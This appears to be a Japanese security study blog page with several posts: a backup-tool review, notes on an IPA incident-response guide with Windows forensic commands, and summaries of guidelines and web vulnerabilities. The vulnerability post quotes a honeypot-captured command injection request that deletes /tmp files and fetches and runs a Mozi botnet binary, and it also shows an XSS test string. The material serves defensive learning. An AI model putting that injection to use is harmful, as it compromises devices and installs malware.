家studyをつづって

IT技術やセキュリティで勉強したことをつづっています。

トップ > ガイドライン

EaseUS Todo Backupによるデータのバックアップ

Windows ガイドライン レビュー

バックアップとは

バックアップという言葉はよく使いますが、バックアップにはいろいろな種類があります。以下にバックアップの種類をまとめます。

 

システムバックアップ

システムバックアップとは、OSやアプリケーションなどを含むシステム全体をバックアップする方法です。イメージバックアップとも呼ばれます。

 

データバックアップ

データバックアップはデータのみバックアップする方法です。また、データバックアップには3種類のやり方があります。

 

フルバックアップ
データを全てバックアップする方法です。以下、どの方法でも最初の1回は必ずフルバックアップになります。


差分バックアップ
差分バックアップは、一定期間毎に変更された内容をバックアップする方法です。

増分バックアップ
増分バックアップは、増えたデータのみをバックアップする方法です。

バックアップ方式の内容は、以下の記事でもまとめているのでご参考いただければ幸いです。

バックアップのローテーション方式に関して - 家studyをつづって

 

また、バックアップのやり方として以下の2つがあります。


オンラインバックアップ

オンラインバックアップとは、システムやサーバが稼働している状態でバックアップを取る方法です。

オフラインバックアップ

オフラインバックアップは、システムから全てのユーザーがログアウトし、停止した状態で行います。

 

 

 

バックアップをする理由

システム障害でPC本体やサーバが壊れてしまった場合、機器自体は交換することで復旧ができますが、そこにあるデータは作り直すことができません。
そのため、データのバックアップは重要となります。

データが壊れる要因として以下のようなものがあげられます。

  • 人的ミス
  • ハードウエア障害
  • ソフトウエア障害
  • ウイルス感染
  • 災害
  • 犯罪

上記の「犯罪」には、改ざんや不正アクセス等のサイバー攻撃等も含まれます。

IPAが毎年発表している情報セキュリティの10大脅威では、2021年の組織に対する脅威として、1位にランサムウェアの脅威があげられています。

ランサムウェアによる攻撃を受けてしまった場合、業務を復旧するためにはバックアップデータを取得し、適切に管理されていることが重要となります。

jpn.nec.com

 

また、コンプライアンスの観点では、日本版SOX法等で企業で取り扱うデータに関わる法律が制定されており、データの保護を確実なものにすることが挙げられています。

個人情報保護法では、個人情報の安全管理措置の実施が義務化されています。
安全管理措置(法第20条)によれば、【必要かつ適切な安全管理措置を講じているとはいえない場合】として、「システム障害により個人データ破損し、また、バックアップが取得されてないために、個人情報が復旧できず、該当する個人がサービス提供を受けられなくなった事例」を挙げています。 

http://privacy-policy.jp/guideline/kojin/kojin2_2_3_2.pdf

 

EaseUS Todo Backupについて

EaseUS Todo Backupとは、EaseUS社が提供する、Windowsを対象にしたバックアップ用のソフトウェアです。

jp.easeus.com

 

EaseUS Todo Backupにはいくつかのエディションがあります。

無料のTrialでは、システム/HDDのバックアップを行うことができます。

f:id:iestudy:20210726222511p:plain

エディション毎の機能比較

Homeエディション以上では、「システムクローン」の機能が解放され、HDDのクローンや、PCの速度向上のため既存のHDDからSSDへ換装するためのデータ移行等が行えるようになります。
 

EaseUS Todo Backupによるバックアップ

EaseUSのインストール

EaseUSは以下のリンクよりダウンロードしました。

EaseUS Todo Backup Homeのダウンロード先

 

ダウンロードしたインストーラを起動します。

f:id:iestudy:20210722105917p:plain

インストーラ起動

 

上記「今すぐインストールする」をクリックするとインストールが進行します。

f:id:iestudy:20210722110208p:plain

インストールの様子

 

しばらくするとインストールが完了します。

f:id:iestudy:20210722110634p:plain

インストール完了画面

 上記「今すぐ始める」を選択するとEaseUS Todo Backupのメニュー画面が表示されます。

 

ディスク/パーティションのバックアップ

EaseUS Todo Backupのメニュー画面より「ディスク/パーティション」を選択します。

f:id:iestudy:20210726214155p:plain

メニュー画面

上記で「ディスク/パーティション」を選択するとHDDの情報が表示されます。
外付けHDDも一覧に表示されるので、EaseUS Todo BackupをインストールしたPCに接続しているHDDやそこに含まれるパーティション単位でバックアップを取得することができます。

f:id:iestudy:20210726214355p:plain

バックアップ元のパーティションまたはディスクの選択

上記画面で「宛先」を選択するとバックアップ先を選択することができます。

ローカルのデバイス以外にも、NAS等、ネットワークを経由した保存場所も指定することができます。

f:id:iestudy:20210726214639p:plain

バックアップ先の指定

また「バックアップオプション」ではパスワードの設定やバックアップの対象外とするファイルの指定、バックアップ完了時のメール通知の設定ができます。

f:id:iestudy:20210726214755p:plain

バックアップオプションメニュー

ここまでで、バックアップ実施の条件設定を行います。

設定完了後、「実行」するとバックアップが開始されます。

f:id:iestudy:20210726214900p:plain

実行時の画面

今回は120GBのディスク(内、使用しているのは20GB程度)をバックアップしました。

時間にしておおよそ15分程度で処理が完了しました。

バックアップが完了すると、バックアップの宛先で指定した場所に「.pbd」のファイルが作成されます。

f:id:iestudy:20210726230241p:plain

バックアップ完了後に作成されたファイル

 

システムのバックアップ

上記と同様の手順で、システムのバックアップも実行可能です。

メニュー画面より「OS」を選択することでシステムのバックアップを行うことができます。

f:id:iestudy:20210726220413p:plain

システムのバックアップ画面イメージ

上記についても、おおよそ10分程度でバックアップの取得ができました。

 

最後に

EaseUS Todo Backupの操作については、画面上に青い吹き出しでメッセージも表示されているため、特段躓くこともなく進めることができました。

また、EaseUSの公式サイトでは各種バックアップの操作について、動画でも解説が公開されているので、そういった情報も参考にできるようです。

 

インシデント発生時の初動調査の手引き

ガイドライン セキュリティ

概要

「サイバーレスキュー隊(J-CRAT)技術レポート2017 インシデント発生時の初動調査の手引き~WindowsOS標準ツールで感染を見つける~」で学んだことをまとめます。

www.ipa.go.jp

 

 

 

 

J-CRATとは

IPAは標的型サイバー攻撃の被害拡大防止のため、2014年7月16日、経済産業省の協力のもと、相談を受けた組織の被害の低減と攻撃の連鎖の遮断を支援する活動として、サイバーレスキュー隊(J-CRAT:Cyber Rescue and Advice Team against targeted attack of Japan)を発足させました。
J-CRATは、「標的型サイバー攻撃特別相談窓口」にて、広く一般から相談や情報提供を受付けています。

 

本記事の概要

この資料は、インシデントの初期段階に実施すべき「初動調査」について具体的な手順を解説しています。
そして、解説されている内容はJ-CRATのレスキュー活動において初動対応でも活用しているものとなります。

ガイドラインの章構成は以下の通りです。

目次
1.はじめに
1.1.本レポートの目的と想定読者
1.2.インシデント対応における調査の全体像
1.3.本レポートでの対象範囲と前提環境
2.基礎知識
2.1.マルウェア感染の特性
2.1.1.永続化
2.1.2.偽装
2.1.3.外部通信
2.2.攻撃痕跡を判断するために
2.2.1.マルウェアが配置されやすい場所(感染頻出箇所)
2.2.2.実行痕跡
2.2.3.攻撃によく使われるツール
2.3.情報収集作業の事前知識
2.4.共通する手法とツール
3.情報収集
3.1.永続化設定の取得
3.1.1.スタートアップ起動プログラム
3.1.2.サービス起動プログラム
3.1.3.スタートアップフォルダ
3.1.4.タスクスケジューラ
3.2.外部通信情報の取得
3.2.1.DNSキャッシュ
3.2.2.ネットワーク接続情報
3.3.実行痕跡の取得
3.3.1.アプリケーションの実行痕跡
3.3.2.実行痕跡の収集
3.4.感染頻出箇所の取得
3.5.情報収集コマンドの整理
3.6.活用例(バッチファイル)
4.評価
4.1.評価の基本的な手順
4.1.1.評価対象別の手順
4.2.永続化設定の評価
4.2.1.スタートアップ起動プログラムの評価と感染例
4.2.1.サービス起動プログラムの評価と感染例
4.2.2.タスクスケジューラでの評価と感染例
4.3.通信先の評価
4.3.1.DNSキャッシュの評価手順
4.3.2.ネットワーク接続情報の評価手順
4.4.実行痕跡の評価
4.4.1.実行痕跡評価の手順
4.4.2.実行痕跡における着眼点
4.5.感染頻出箇所の評価
4.5.1.感染頻出箇所における着眼点
4.6.攻撃事例と痕跡
4.6.1.攻撃事例概要
4.6.2.痕跡
5.おわりに

 

2章では標的型攻撃で使用されるマルウェアの基本的な情報をまとめています。

マルウェアの特性

永続化

攻撃者はRATを利用する場合が多く見られます。また、感染させた状態を維持しておくため、RAT等をOS起動時に自動的に起動するように設定します。これが永続化という特性です。

Windowsでは以下の部分に設定されることが多いです。

  • 自動起動レジストリ
  • スタートアップ起動プログラム
  • サービス起動プログラム
  • スタートアップフォルダ
  • ログオンスクリプト
  • タスクスケジューラ

偽装

マルウェアはフォルダ名やファイル名、サービス名などを偽装することが多く見られます。

  • 著名なアプリケーションと同じ、または似せた名称を使用
  • Windowsの正規ファイルと同じ、または似せた名称をファイル名を使用

また、マルウェアの起動時に偽装を行うケースもあります。

  • Windows標準の正規プログラムを利用する。
  • 正規アプリケーションの一部のプログラムを利用する。

外部通信

外部通信に関しては、ネットワーク機器の調査が必要になりますが、このレポートではPCを対象としており、外部への通信の調査の一つとして「DNSキャッシュ」の調査を解説しています。

 

攻撃の痕跡確認

マルウェアが配置されやすい場所(感染頻出箇所)

マルウェアが配置される傾向にあるフォルダがあります。特に管理者権限がないユーザーが権限を有し、環境変数でアクセスしやすい箇所がそれにあたります。

f:id:iestudy:20210409200757p:plain

感染頻出箇所

 

実行痕跡

マルウェアが実行された痕跡の調査例として以下のものが解説されています。

f:id:iestudy:20210409200942p:plain

実行痕跡の例

上記の「RunMRU」に関して、これは「ファイル名を指定して実行」で実行したプログラムの情報で、以下のレジストリに格納されています。

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU

 

また「Prefetch」は、利用頻度が高いアプリケーションの起動を高速化する仕組みで、WindowsXPから導入されたものです。プログラムが起動された10秒後に、「C:\Windows\Prefetch」に、ファイル名が「プログラム名-フルパスのハッシュ値.pf」のファイルが作成されます。

ハッシュ値は、プログラムのフルパスから計算されるため、「プログラム名」部分が同一でハッシュ値が異なるPFファイルは、異なるフォルダから実行されたと判断できます。
PFファイルには、プログラムのフルパス、実行日時、実行回数、プログラムが起動時に読み込んだファイル名(DLLファイルなど)、ボリューム関連情報が記録されます。

 

3章では実際の調査方法を解説しています。

 

調査するユーザアカウントに関して

インシデントの調査時には、調査するユーザアカウントに注意する必要があります。

Windowsのレジストリには以下のものがあります。

f:id:iestudy:20210409202354p:plain

主なルートキー

HKCUは、現在ログオンしているユーザーのレジストリとなるため、インシデント検知時のログオンユーザーと情報収集時のログオンユーザーが異なると情報収集する内容も異なる場合があります。

また、レジストリ以外にもユーザごとに作成されるものとしてプロファイルがあります。
レジストリと同じく、調査対象となるユーザーアカウントでログオン時に情報収集することが推奨されます。
なお、プロファイルの情報は以下のコマンドで確認できます。

wmic path win32_userprofile

永続化設定の取得

システムのスタートアップ時に起動されるプログラムをレジストリから取得します。

reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /s

reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"/s

reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce"/s

reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx" /s

reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices" /s

reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce"/s

reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\policies\Explorer\Run"/s

reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon"/v "Userinit"

reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon"/v "Shell"

reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" /s

reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows"/v "AppInit_DLLs"

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /s

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce" /s

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnceEx" /s

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices" /s

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce" /s

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\policies\Explorer\Run"/s

reg query "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows"/v "Load"

reg query "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows"/v "Run"

reg query "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell"

reg query "HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run"/s

 

サービス起動プログラムもレジストリから収集できます。

reg query HKLM\SYSTEM\currentControlSet\services /s

 

スタートアップフォルダの位置は、下記レジストリに設定されています。
このレジストリの値“Startup”を照会するよう指定して収集します。

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"/v "Startup"

reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"/v "Startup"

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders"/v "Startup"

reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders"/v "Startup"

 

上記実行後に実際のファイルを取得します

dir /q /r /s "C:\Users\hajime.kamagata\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"


タスクスケジューラも永続化させる手段としてよく使われます。

下記コマンドで設定内容を出力できます。

schtasks /fo CSV /query /v

外部通信情報の取得

ipconfig /displaydns
netstat -naob

 

実行痕跡

プリフェッチ

dir /od /tc C:\Windows\PreFetch\

RunMRU

reg query " HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU "/s

TypedURLsTypedURLs

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" /s

PsExecの実行痕跡

PsExecはリモート実行ツールで、感染拡大によく利用されます。レジストリを確認することで、過去に実行したことがあるかを判断できます。

reg query "HKEY_USERS" /s /k /f PsExec
reg query "HKCU\Software\Sysinternals\PsExec" /s

 

 

 

 

「クレジットカード・セキュリティガイドライン」(実行計画の後継文書)の概要

ガイドライン 金融 セキュリティ

「クレジットカード・セキュリティガイドライン」(実行計画の後継文書)について

発行機関 :クレジット取引セキュリティ対策協議会(日本クレジット協会)

発行年月日:2020年3月

 

www.j-credit.or.jp



 

クレジット取引セキュリティ対策協議会とは

クレジット取引セキュリティ対策協議会とは、クレジットカード取引において「国際水準のセキュリティ環境」を整備することを目的として設立された団体です。
これまで、2016年2月から2019年3月にかけて「実行計画」を策定し、セキュリティ対策の推進を図ってきました。

 

実行計画

https://www.j-credit.or.jp/security/pdf/plan_2019.pdf


さらに上記「実行計画」の公開後もクレジットカード取引におけるセキュリティ向上のため、「クレジットカード・セキュリティガイドライン」を策定しました。
本記事では上記のガイドラインを対象にしています。

 

 

 

クレジットカード・セキュリティガイドラインとは

クレジットカード・セキュリティガイドラインは、「割賦販売法(後払分野)に基づく監督の基本方針」において割賦販売法で義務付けられているカード番号等の適切な管理及び不正利用防止措置の実務上の指針として位置付けられるものです。
このガイドラインでは、割賦販売法で規定される措置に該当する部分を【指針対策】と記載しています。

 

補足:「割賦販売」とは

割賦販売(かっぷはんばい)とは、売買代金の支払いを分割して支払うことを条件とした販売方式。 支払間隔に応じて週賦・旬賦・月賦・年賦などの方法がある。 消費者信用のうちの、販売信用の一つ。

割賦販売 - Wikipedia

 

クレジットカード情報の保護対策として

ガイドラインでは、加盟店における対策として以下を示しています。

 

(1)加盟店
■カード情報を保持しない「非保持化」(非保持と同等/相当を含む)又はカード情報を保持する場合はPCI DSSに準拠する。【指針対策】

f:id:iestudy:20210227102858p:plain

加盟店における対策

補足:「加盟店」とは

加盟店は、クレジットカードにおいては、「マーチャント(Merchant)」とも呼ばれ、ホテルや旅館、百貨店、スーパー、コンビニ、量販店、商店、飲食店、病院、ガソリンスタンド、Webサイトなど、街中やインターネットでカードを使えるところをいいます。

加盟店とは|金融経済用語集 - iFinance

 

非保持化について

クレジットカードの非保持化の方策として、ガイドラインでは以下の内容が示されています。

f:id:iestudy:20210227104519p:plain

非保持化の対策について

上記の内、リダイレクト型決済についてイメージを以下に示します。

f:id:iestudy:20210227104637p:plain

リダイレクト型決済と対策範囲

リダイレクト型決済の場合、決済時は別のサイト(上図のPSP)で行います。
PSPはクレジットカード情報を取り扱うためにPCI DSSに準拠していますが、加盟店側はクレジットカードを持たない(非保持化)ため、特別なセキュリティの要求事項は発生しません。

 

ただし、クレジットカードを非保持化としている場合であっても、ECサイトの脆弱性を悪用され、決済画面へのリンクが攻撃者のフィッシングサイトに変更されることで、非保持としている加盟店のECサイトからクレジットカード情報が漏洩する事例が確認されています。

www.itmedia.co.jp

 

www.i-ori.jp

 

補足:PCI DSSの12要件について

安全なネットワークとシステムの構築・維持

  • 要件1:カード会員データ保護のためのファイアウォールのインストールと構成の維持
  • 要件2:システムパスワードおよびその他のセキュリティパラメータには ベンダ提供のデフォルト値を使用しない

カード会員データの保護

  • 要件3:保存されるカード会員データの保護
  • 要件4:カード会員データをオープンな公共ネットワーク経由で伝送する場合の暗号化

脆弱性管理プログラムの整備

  • 要件5:すべてのシステムをマルウェアからの保護とウィルス対策ソフトウェアまたはプログラムの定期的な更新
  • 要件6:安全性の高いシステムとアプリケーションを開発と保守

強固なアクセス制御手法の導入

  • 要件7:業務上必要な範囲内にカード会員データへのアクセスを制限する
  • 要件8:システムコンポーネントへのアクセスの確認と許可
  • 要件9:カード会員データへの物理アクセスの制限

定期的なネットワークの監視及びテスト

  • 要件10:ネットワークリソースおよびカード会員データへのすべてのアクセスの追跡および監視
  • 要件11:セキュリティシステムおよび管理手順の定期的なテスト

情報セキュリティーポリシーの維持

  • 要件12: すべての担当者の情報セキュリティポリシーの整備維持

 

 

 

「クラウドサービス利用のための情報セキュリティマネジメントガイドライン」の概要

ガイドライン セキュリティ クラウド

クラウドサービス利用のための情報セキュリティマネジメントガイドライン

発行機関:経済産業省
発行年:2013年

参考

www.meti.go.jp

https://www.meti.go.jp/policy/netsecurity/downloadfiles/cloudsec2013fy.pdf

 

 

 

概要

「クラウドサービス利用のための情報セキュリティマネジメントガイドライン」は、クラウドサービスの利用増加にあたってのセキュリティ検討事項をまとめたもので、クラウドの安全な利用を促し、「クラウド利用者と事業者における信頼関係の強化に役立てる」ことを目的に公開されたガイドラインです。

 

「クラウドサービス利用のための情報セキュリティマネジメントガイドライン」の位置づけ

以下は序文より抜粋したものです。

国内の組織の情報セキュリティには,国際的な規格(ISO/IEC 27002:2005)に準拠したJIS Q 27002:2006 情報技術―セキュリティ技術―情報セキュリティマネジメントの実践のための規範(以下「JIS Q 27002(実践のための規範)」という。)に基づく管理策の実施が推奨されており,実際に多く利用されている。

JIS Q 27002(実践のための規範)には,第三者の提供するサービスの利用に関する管理策があるが,組織がITを所有せずに全面的にクラウドコンピューティングを利用する場合には,この管理策が求める事項だけでは組織の情報セキュリティを確保するためには不足があるのが実情である。

そのため,クラウド利用者の視点からJIS Q 27002(実践のための規範)の各管理策を再考し,クラウドコンピューティングを利用する組織においてこの規格に基づいた情報セキュリティ対策が円滑に行われることを目的として,このガイドラインを作成した。

このガイドラインには,組織がクラウドコンピューティングを全面的に利用する極限状態を想定し,
①自ら行うべきこと,②クラウド事業者に対して求める必要のあること,さらに,③クラウドコンピューティング環境における情報セキュリティマネジメントの仕組みについて記載している。

組織において,このガイドラインを参考にクラウドコンピューティングに対応した情報セキュリティの仕組みを整備するとともに,クラウド利用者のみで行うことができない管理策を認識し,クラウド利用者がクラウド事業者に対して様々な情報を求める必要がある。

 

「クラウドサービス利用のための情報セキュリティマネジメントガイドライン」は、JIS Q 27002に基づきクラウド利用にあたっての管理策をまとめたものであり内容的にはJIS Q 27017にも関連するものです。

 

参考:JIS Q 27017

この規格は,2015年に第1版として発行されたISO/IEC 27017を基に,技術的内容及び構成を変更することなく作成した日本工業規格である。
この規格で規定する指針は,JIS Q 27002に規定する指針に追加し,これを補うものである。

https://kikakurui.com/q/Q27017-2016-01.html

 

Salesforceの一件に関連すると思う項目

Salesforce利用ユーザで発生したインシデント

Salesforceは2020年12月25日に、製品を利用しているユーザにおいて、設定ミスに起因した情報漏えいが発生していることを発表しました。

対象となる製品は「Experience Cloud(旧 Community Cloud)」「Salesforceサイト」「Site.com」で、外部のユーザに情報共有する際に、設定が適切でないと第三者からも情報を閲覧される恐れがあるといものです。
上記の件では楽天、PayPayでの被害が報じられています。

Salesforceでは、ゲストユーザセキュリティポリシーのベストプラクティスを参考にし、設定を確認することを推奨しています。

 

ベストプラクティス

help.salesforce.com


なお、上記の設定不備を検証できるツールも公開されているようです。

 

解説サイト:Salesforce Lightning Platformへの攻撃手法について

Salesforce Lightning Platformへの攻撃手法について | by monii | Dec, 2020 | Medium


PoC

github.com

 

ガイドラインに示されている指針

当該ガイドライン内「12.5 開発及びサポートプロセスにおけるセキュリティ」には以下のような記載がありました。

「12.5 開発及びサポートプロセスにおけるセキュリティ」
目的:業務用ソフトウェアシステムのソフトウェア及び情報のセキュリティを維持するため。

プロジェクト及びサポート環境は,厳しく管理することが望ましい。業務用ソフトウェアシステムに責任をもつ管理者は,プロジェクト又はサポート環境のセキュリティにも責任を負うことが望ましい。
変更によってシステム又は運用環境のセキュリティが損なわれないことを点検するために,管理者は,提案されているすべてのシステム変更のレビューを,確実にすることが望ましい。

「12.5.1 変更管理手順」


管理策
変更の実施は,正式な変更管理手順の使用によって,管理することが望ましい。

クラウド利用者のための実施の手引
クラウド利用者は,変更管理手順にクラウドサービスに関する内容を追加することが望ましい。

クラウド事業者の実施が望まれる事項
クラウド事業者は,クラウドサービスの変更に関して,必要に応じて次の事項を実施することが望ましい。
a)システム変更の実施に関するクラウド利用者への通知
b)システム機能の追加・変更に関するクラウド利用者への通知
c)ソフトウェアの更新についての版数の管理
d)システム変更についての監査証跡・変更履歴の管理及び利用者への提示

クラウドサービスの関連情報
クラウドサービスの利用においてはスケーラビリティの確保が十分になされているとはいえ,マルチテナントであることを考慮すれば,ある一定時期に十分なサービスが得られない場合があることに留意すること。また,IaaSやPaaSの契約形態においては自動的に帯域を確保する機能を有していないものもある。スケーラビリティ以外の変更管理においても同様に,自動化されたシステムに依存せずに,クラウド利用者自らが管理できる手順を明確にすることが期待される。

 

利用者側の管理策として、システム変更がある場合のレビューが示されています。
これがSalesforceの件に関して、利用者側としての確認に関連すると見れます。
ただし実際の問題として、管理者がそこまで追従するのは難しいのが現状ではないかと思います。

 

対策となると思われるソリューション

クラウドの設定を調査するようなサービスはいくつか提供されているようです。
サービスの内容までは把握できていませんが、以下のようなサービスで対応しているクラウドサービスであれば、Saleforceの件の対策案の一つになるかもしれません。
ゆくゆくはCSPMも対応できるソリューションになるのでしょうか。

 

ソリューションの例

ascii.jp

www.kccs.co.jp

 

参考にさせていただいたサイト

news.yahoo.co.jp

 

news.yahoo.co.jp

 

piyolog.hatenadiary.jp

 

 

 

 



各国の個人情報保護の取り組みと情報流通に関する動向(2020年11月調べ)

ガイドライン 個人情報

概要

クラウドの普及と利用の促進により、国内、海外問わず、様々なサービスを利用する機会が増えています。
しかし、サービスを利用する場合、特に組織においては預託するデータの保護に関する取り組みについて考える必要があります。
今回は個人情報に関する各国の規制や流通の取り組みについて調べてみました。

 

 

 

背景(DFFTについて)

DFFT(Data Free Flow with Trust、信頼ある自由なデータ流通)とは、2019年1月23日に行われた「ダボス会議」で提言された言葉です。
ダボス会議で安倍首相はデータの活用が重要であり、そのためにDFFTの体制を築くことを提言しました。

www.kantei.go.jp


ただし、国境をまたいでデータを移動させるには、各国のルールに従わなければならず膨大な作業が必要になります。

f:id:iestudy:20201119222257p:plain

各国の個人情報保護ルール


上記課題に対して、国間でのデータ流通のための枠組み作りが行われています。

 

EU圏への対応

日本とEUではデータ流通のため、相互に個人情報保護に関する取り組みについて十分性認定を行いました。
これにより、「個人情報保護に関する法令及びガイドライン」に加えて「個人情報の保護に関する法律に係るEU及び英国域内から十分性認定により移転を受けた個人データの取扱いに関する補完的ルール」を遵守することで取り扱うことができます。

www.ppc.go.jp

 

https://www.ppc.go.jp/files/pdf/Supplementary_Rules.pdf

  

APECにおける取組 

APECでは2011年にCBPR(Cross Border Privacy Rules)を策定しました。
CBPRは企業等の越境個人データの保護に関して、APECプライバシー原則への適合性を認証するシステムです。

www.jipdec.or.jp

 

しかし、上記のルールに関して、アメリカからは見直しを求める動きもあります。

CBPRはAPECの域内でのルールなので、APECに加盟している中国の意見を無視できません。APECの議論でも、データ流通を促すアメリカと国家主導で管理する中国が対立することが多かったといいます。アメリカはCBPRをAPECから独立させることで、中国の干渉を受けずにルール作りを行い、データを吸い取られる事態を避ける狙いがあるとみられます。

APECのデータ流通ルール、なぜ見直す? :日本経済新聞

 

現時点(2020年11月)で、日本とアメリカ間では、日本とEUのような相互認証の仕組みはありません。 
対アメリカに関しては、今後CBPRの拡張や、プライバシーシールドのような新しい相互認証の枠組みを策定することで情報の流通を図るのではないでしょうか。

 

参考にさせていただいたサイト

http://www.db-security.org/seminar/data_2017/dbsc0213_2.pdf

 

Webアプリの脆弱性の概要 ~「安全なウェブサイトの作り方」を読んで~

セキュリティ ガイドライン

概要

「安全なウェブサイトの作り方」をよみ、Webアプリの脆弱性について調べたことをまとめました。

 

 

 

SQLインジェクション

概要

ウェブアプリケーションの多くはデータベースと連携しており、ユーザの入力情報からSQL文作成します。
SQL文の組み立てに問題がある場合、SQLインジェクションの攻撃を受ける可能性があります。

f:id:iestudy:20201119195210p:plain

SQLインジェクションのイメージ


SQLインジェクションには、本来非公開であるデータベースの内容を表示させる以外に、SQLサーバにあるコマンドを使ったものがあります。

  • convertやcast等で型変換のエラーを意図的に発生させ、そのエラーの内容からデータベースを攻撃するための情報を得る(エラー)
  • waitfor delayにより、一定時間実行を停止する命令を複数回繰り返して積み上げる(スタック)

対策

SQLインジェクションの対策としては、SQL文の組み立てをあらかじめ定義しておくプリペアードクエリの実装が挙げられます。
また、プレースホルダでデータの型を定めておくことで意図的なおきます。

 

クロスサイトスクリプティング(XSS)

概要

ウェブアプリケーションの中には、ユーザの入力やHTTPヘッダの情報を元にして出力するものがあります。
ウェブページへの出力処理に問題があり、入力に悪意のあるスクリプト等を埋め込まれてしまい、それをそのまま出力させる攻撃がクロスサイトスクリプティングです。

クロスサイトスクリプティングには3つの種類があります。

f:id:iestudy:20201119195346p:plain

XSSの種類

反射型XSS(Reflected XSS)

ユーザからのリクエストに含まれるスクリプトをそのままレスポンスとして出力してしまうタイプのXSSです。
HTTPリクエストペイロードに攻撃のためのJavaScriptが含まれているもの等が挙げられます。

 

格納型XSS(Stored XSS)

リクエストに含まれる悪意のあるスクリプトを、ウェブアプリケーション内部で保存し、ユーザの閲覧時に保存されたスクリプトが出力される攻撃です。
掲示板やSNSのプロフィール等に攻撃のスクリプトが含まれるケースがあります。

 

DOM Based XSS

ウェブページに含まれる正規のスクリプトにより、動的にウェブページを操作した結果、意図しないスクリプトをウェブページに出力してしまうタイプのXSSです。

DOM XSSは、動的ページの生成の際に、ユーザの入力がJavaScriptコードを含むHTMLとして組み立てられて攻撃が行われるものです。

例えば、Webページで"hensuu"に入力を入れる個所がある場合に、以下のような入力がある場合、Webページの生成においてJavascriptを含んだタグとして生成されます。


入力値
"%3cimg%20src%3Da%20error%3dalert(1)%3e"

 

URLデコード後
<img src=a error=alert(1)>

 

反射型XSSではHTTPリクエストにそのままJavaScriptのコードが書かれ、それがそのまま出力されますが、DOM型XSSでは上記のように、HTMLの生成時にJavaScriptコードが読み込まれるといった違いがあります。

参考:DOMとは

DOMとはDOM(Document Object Model)は、HTMLドキュメントやXMLドキュメントをアプリケーションから操作するためのAPIである。W3Cが標準化2しており、様々なプログラミング言語やライブラリがDOMをサポートしている。

https://www.ipa.go.jp/files/000024729.pdf

対策

基本的な対策としては、JavaScriptのコードを実行させないために、ユーザの入力に含まれる「<」や「>」といった文字をサニタイズすることが挙げられます。

https://www.ipa.go.jp/files/000024726.pdf


なお、SQLインジェクションやXSSは検知数も多いようです。

https://www.lac.co.jp/lacwatch/pdf/20200406_jsoc_vol26.pdf

 

コマンドインジェクション

概要

ウェブアプリケーションによっては、悪意のあるHTTPのリクエストを受信する事で、ウェブサーバのOSコマンドを不正に実行されてしまう脆弱性が含まれるものがあります。

f:id:iestudy:20201119200242p:plain

コマンドインジェクションのイメージ

 

悪意のあるHTTPリクエストの例

  • GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://管理画面のURL/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/tsetting.htm=1
    (以前に構築したハニーポットに届いたリクエスト) 
  • リクエストのペイロード部分に$(実行したいコマンド)といったような形式でコマンドの実行を試みるもの

対策

根本的な対策としてはシェルを起動できる言語機能の利用を避けることが挙げられます。
また、上記対策が取れない場合は、特にユーザからの入力があるような画面においては攻撃に悪用される文字(「|」、「<」、「>」等)を無害化する事が挙げられます。

www.shadan-kun.com

yamory.io

 



 

クラウドのセキュリティ評価制度「ISMAP」

ガイドライン クラウド セキュリティ

ランキング参加中
セキュリティ

概要

ISMAPとはInformation system Security Management and Assessment Programの略で、 日本語では「政府情報システムのためのセキュリティ評価制度」と呼ばれます。

ISMAPは、クラウド・バイ・デフォルトの方針が打ち出されたことを受け、政府機関においてクラウドサービスを利用する際の、クラウドサービスの安全性評価基準の必要性うけて策定されました。

 

 

 

ISMAPは、政府機関が求めるセキュリティ要求を満たしているクラウドサービスをあらかじめ評価・登録してあるため、政府機関がクラウドサービスを利用する際の選定基準として活用できます。

ISMAPはアメリカの「FedRAMP」に近い制度で、複数のセキュリティ基準をベースに策定されています。

 

f:id:iestudy:20201021134935p:plain

ISMAPの構成
  • JIS Q(ISO/IEC) 27001、27002と、クラウドサービスの情報セキュリティに関するJIS Q(ISO/IEC) 27017が基礎
  • 政府統一基準に含まれる内容で上記に含まれない内容を追加
  • NIST SP800-53の内容から、インシデントレスポンスに関連する内容を中心に追加

 

<参考:FedRAMP>

FedRAMP(Federal Risk and Authorization Management Program)は、アメリカ政府の定めるクラウドサービスに関するセキュリティ評価のガイドラインです。

ベンダがアメリカ政府機関にサービスを提供する場合は、上記セキュリティ基準を満たす必要があります。

www.newton-consulting.co.jp

 

ISMAPの動向

ISMAPは2020年8月頃に審査機関の登録を決定し、今後、各種ベンダからのサービス登録申請を受け付け、2020年12月から2021年1月頃には登録サービスが決定し、ISMAPクラウドサービスリストを公開する予定となります。

